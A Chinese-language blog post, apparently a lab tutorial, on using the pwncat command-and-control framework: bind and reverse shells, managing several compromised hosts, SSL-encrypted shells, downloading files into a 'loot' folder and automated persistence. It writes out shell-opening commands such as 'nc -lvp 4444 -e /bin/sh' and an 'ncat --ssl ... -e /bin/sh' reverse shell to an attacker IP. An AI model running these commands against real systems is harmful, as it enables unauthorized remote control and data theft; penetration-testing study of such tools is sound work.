<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title>工具-pwncat使用 · yutian's blog</title><meta name="description" content="工具-pwncat使用 - yutian"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/logo.ico"><link rel="stylesheet" href="/css/gandalfr.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.13.1/styles/solarized-light.min.css"><link rel="search" type="application/opensearchdescription+xml" href="https://yutianqaq.github.io/atom.xml" title="yutian's blog"><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="yutian's blog" type="application/atom+xml">
</head><body><div class="wrap"><header><a href="/" class="logo-link"><img src="https://yutianqaq.github.io/2023/11/23/Hackthebox-S3-Hospital/logo.jpg" alt="logo"></a><ul class="nav nav-list"><li class="nav-list-item"><a href="https://github.com/yutianqaq" target="_blank" class="nav-list-link">GITHUB</a></li><li class="nav-list-item"><a href="/archives/" target="_self" class="nav-list-link">ARCHIVE</a></li><li class="nav-list-item"><a href="/about" target="_self" class="nav-list-link">ABOUT</a></li><li class="nav-list-item"><a href="/hack-tools" target="_self" class="nav-list-link">TOOLS</a></li><li class="nav-list-item"><a href="/CheatSheet" target="_self" class="nav-list-link">CHEATSHEET</a></li><li class="nav-list-item"><a href="/CodeSnippets" target="_self" class="nav-list-link">CODESNIPPETS</a></li><li class="nav-list-item"><a href="/atom.xml" target="_self" class="nav-list-link">RSS</a></li></ul></header><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">工具-pwncat使用</h1><div class="tags"><a href="/tags/Tools/" class="tag-title">#Tools</a></div><div class="post-info">Dec 25, 2023</div><div class="post-content"><blockquote>
<p>pwncat是一个命令和控制框架，可以将基本的反向或绑定shell转化为一个功能齐全的利用平台。然后，它将尝试在远程主机上启动一个伪终端，并为您提供原始终端访问。<br>但pwncat不止于此。除了自动的获取全交互式终端外，pwncat还提供了一个本地Shell界面，可以用来使用自动枚举模块、自动持久化，甚至自动提权，文件上传&#x2F;下载。</p>
</blockquote>
<p>当在获取到一个基本的反向 shell 后，还需要做以下步骤来防止终端意外退出。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">python3 -c &#39;import pty;pty.spawn(&quot;&#x2F;bin&#x2F;bash&quot;)&#39;</span><br><span class="line"></span><br><span class="line">export TERM&#x3D;xterm</span><br><span class="line"></span><br><span class="line">Ctrl + Z</span><br><span class="line"></span><br><span class="line">export TERM&#x3D;xterm</span><br><span class="line"></span><br><span class="line">stty rows 38 columns 116</span><br></pre></td></tr></table></figure>
<p>当输入这几天命令后才能防止 Ctrl + C 意外结束。遇到上传&#x2F;下载文件还需要使用 python 开启一个临时的 http 服务器。</p>
<p>而现在这些步骤都可以被 <a href="https://github.com/calebstewart/pwncat" target="_blank" rel="noopener">calebstewart&#x2F;pwncat: Fancy reverse and bind shell handler</a> 来自动实现。</p>
<h1 id="pwncat-使用"><a href="#pwncat-使用" class="headerlink" title="pwncat 使用"></a>pwncat 使用</h1><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>对于仅只用的，推荐下面的命令安装</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python3 -m venv pwncat-env</span><br><span class="line">source pwncat-env&#x2F;bin&#x2F;activate</span><br><span class="line">pip install pwncat-cs</span><br></pre></td></tr></table></figure>

<p>对于开发环境，使用这里的命令安装</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># Setup pwncat inside a poetry-managed virtual environment</span><br><span class="line">git clone https:&#x2F;&#x2F;github.com&#x2F;calebstewart&#x2F;pwncat</span><br><span class="line">cd pwncat</span><br><span class="line">poetry install</span><br><span class="line"></span><br><span class="line"># Enter the virtual environment</span><br><span class="line">poetry shell</span><br></pre></td></tr></table></figure>
<h2 id="bind-shell-获取"><a href="#bind-shell-获取" class="headerlink" title="bind shell 获取"></a>bind shell 获取</h2><p>首先在受害者机器输入下面的命令，这条命令会将 &#x2F;bin&#x2F;sh 绑定到 4444 端口</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 4444 -e &#x2F;bin&#x2F;sh</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/84ef0599975588b51ecf64bf0a603f47.png"></p>
<p>接下来使用 pwncat 连接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwncat-cs 目标ip 目标端口</span><br><span class="line">pwncat-cs 192.168.99.136 4444</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/64cd639912462803413c933edc97e859.png"></p>
<h2 id="反向-shell-获取"><a href="#反向-shell-获取" class="headerlink" title="反向 shell 获取"></a>反向 shell 获取</h2><p>在攻击机开启监听端口 4444<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/5b94f4db0cb24ba4d77fa24ccc73e9ea.png"></p>
<p>当在受害者连接到攻击机时，将返回 shell<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/642ef849b75b2fa7e7d87e3d4ebfb11a.png"></p>
<p>此时是本地交互终端（控制台），以 local 作为标志。<br>这里可以切换多个控制的主机、文件上传&#x2F;文件下载、模块自动利用等。</p>
<h3 id="进入到被控机器"><a href="#进入到被控机器" class="headerlink" title="进入到被控机器"></a>进入到被控机器</h3><p>对于一台主机，可以使用 Ctrl + D 键进入被控机器，以 remote 为标志。再次按 Ctrl + D 将返回本地交互终端。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/f9628be695f930e34f21afc86b79714a.png"></p>
<h3 id="多台主机控制"><a href="#多台主机控制" class="headerlink" title="多台主机控制"></a>多台主机控制</h3><p>首先开启监听，这将在后台监听 4444 端口的连接。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/931ae1265e398d5cb13348782b851b1a.png"></p>
<p>在受害者连接监听端口 4444，这样将会有两台主机。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/974b19b3a8fcf4fde34dce5063dfe4bf.png"></p>
<p>使用 session id 的方式切换被控机<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/87b74667c060f82d1aa589a18d591925.png"></p>
<p>使用 listeners 可以看到正在监听的端口，此时监听的端口可以接收多台主机。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/3d5556aa63d5cb9fe52e3279ab216447.png"></p>
<p>也可以使用参数来限制上线数量。使用 -c 来限制数量，这样 1234 端口将仅限被连接两次。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">listen -c 2 -m linux 1234</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/78863235203f891635696be33ddc3c86.png"></p>
<p>这里可以看到，第三次连接失败了。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/f7b55305ca2c8f8c03842455c2a04c53.png"></p>
<p><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/87fa1db8f5495f2556668e704c8b5dd6.png"></p>
<p>需要注意的使，当 pwncat 程序退出后，将丢失所有会话<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/d2dfaf315717295ac72b8d08fd760631.png"></p>
<h2 id="开启-ssl-加密"><a href="#开启-ssl-加密" class="headerlink" title="开启 ssl 加密"></a>开启 ssl 加密</h2><p>通过 wireshark 抓包可以看到，流量是明文的<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/10dbe2eca93920ac11c63f415f73481a.png"></p>
<p>pwncat 还支持 ssl，下面将介绍开启 ssl 连接的步骤。<br>创建一个支持 ssl 的监听器，这将会自动创建一个自签名的 ssl 证书。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/ea9dca2409aaac25554ebef50e44edfc.png"></p>
<p>使用支持 ssl 连接的 nc 来连接目标端口。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ncat --ssl 192.168.99.136 4444 -e &#x2F;bin&#x2F;sh</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/2c2116c7122183b25a710e36334c76a1.png"></p>
<p>此时与会话1的交互将是被加密的，4444 -&gt; 33644 流量加密，1234 -&gt; 48548 明文传输。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/7c78695916a526eb01dd4bbe49796ccb.png"></p>
<p>而会话 0 是明文连接。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/428853487ee19e46ec2af719d8ebef16.png"></p>
<h2 id="文件下载-文件上传"><a href="#文件下载-文件上传" class="headerlink" title="文件下载&#x2F;文件上传"></a>文件下载&#x2F;文件上传</h2><h3 id="文件下载"><a href="#文件下载" class="headerlink" title="文件下载"></a>文件下载</h3><p>pwncat 使用 lcd 来切换 的目录，创建一个 pwncat-loot，使用 lcd 切换到此目录。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/d96ab49324e1e36b757069f4e72b61fa.png"></p>
<p>使用 download 下载文件将会下载到工作目录 pwncat-loot。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/84141365e66cff46314053383bfdb824.png"></p>
<h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><p>将要上传的文件复制到 pwncat-loot。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/1eb3944e76f37e9817a37e6903cf5308.png"></p>
<p>使用 upload 上传到被控机器。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/bfe0cf133529d4e924ecba859a112116.png"></p>
<h2 id="ssh-连接"><a href="#ssh-连接" class="headerlink" title="ssh 连接"></a>ssh 连接</h2><p>除了正向、反向外，还支持 ssh 连接<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/7438d08ca6f9fe8cece941c6138404e1.png"></p>
<p>这样就可以使用 pwncat 来管理多个 ssh 会话了</p>
<h2 id="linux-权限维持自动化模块"><a href="#linux-权限维持自动化模块" class="headerlink" title="linux 权限维持自动化模块"></a>linux 权限维持自动化模块</h2><p>此外 pwncat 还有一些好用的模块，可以用来权限维持。<br><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/fb73522bae73af38a85bc6a1e0b1f989.png"></p>
<p><img src="/2023/12/25/%E5%B7%A5%E5%85%B7-pwncat%E4%BD%BF%E7%94%A8/3253d78bdc84f5df676bfba1a388b138.png"></p>
</div></article></div><span id="busuanzi_container_page_pv"></span> 本文总阅读量<span id="busuanzi_value_page_pv"></span></main><footer><div class="paginator"><a href="/2023/12/28/%E5%85%8D%E6%9D%80-%E5%9F%BA%E4%BA%8E-Spring-Boot-%E5%9C%A8%E7%BA%BF%E5%85%8D%E6%9D%80%E5%B9%B3%E5%8F%B0%E5%BC%80%E5%8F%91%E8%AE%B0%E5%BD%95/" class="prev">PREV</a><a href="/2023/12/18/%E5%8D%A1%E5%B7%B4%E6%96%AF%E5%9F%BA%E6%BC%94%E7%A4%BA/" class="next">NEXT</a></div><div class="copyright"><p>© 2023 <a href="https://yutianqaq.github.io">yutian</a>, powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/MikeCoder/hexo-theme-gandalfr" target="_blank">hexo-theme-gandalfr</a>.</p><span id="busuanzi_container_site_pv"> </span>本站总访问量<span id="busuanzi_value_site_pv"> </span>次<span id="busuanzi_container_site_uv"> </span>本站总访客量<span id="busuanzi_value_site_uv"> </span>次</div></footer></div><script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js?config=TeX-MML-AM_CHTML" integrity="sha384-crwIf/BuaWM9rM65iM+dWFldgQ1Un8jWZMuh3puxb8TOY9+linwLoI7ZHZT+aekW" crossorigin="anonymous"></script><script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.13.1/highlight.min.js" crossorigin="anonymous"></script><script src="//cdn.bootcss.com/jquery/3.1.1/jquery.js" crossorigin="anonymous"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script>$(document).ready(function() { hljs.configure({useBR: true}); $('pre').each(function(i, block) { hljs.highlightBlock(block); }); });</script></body></html>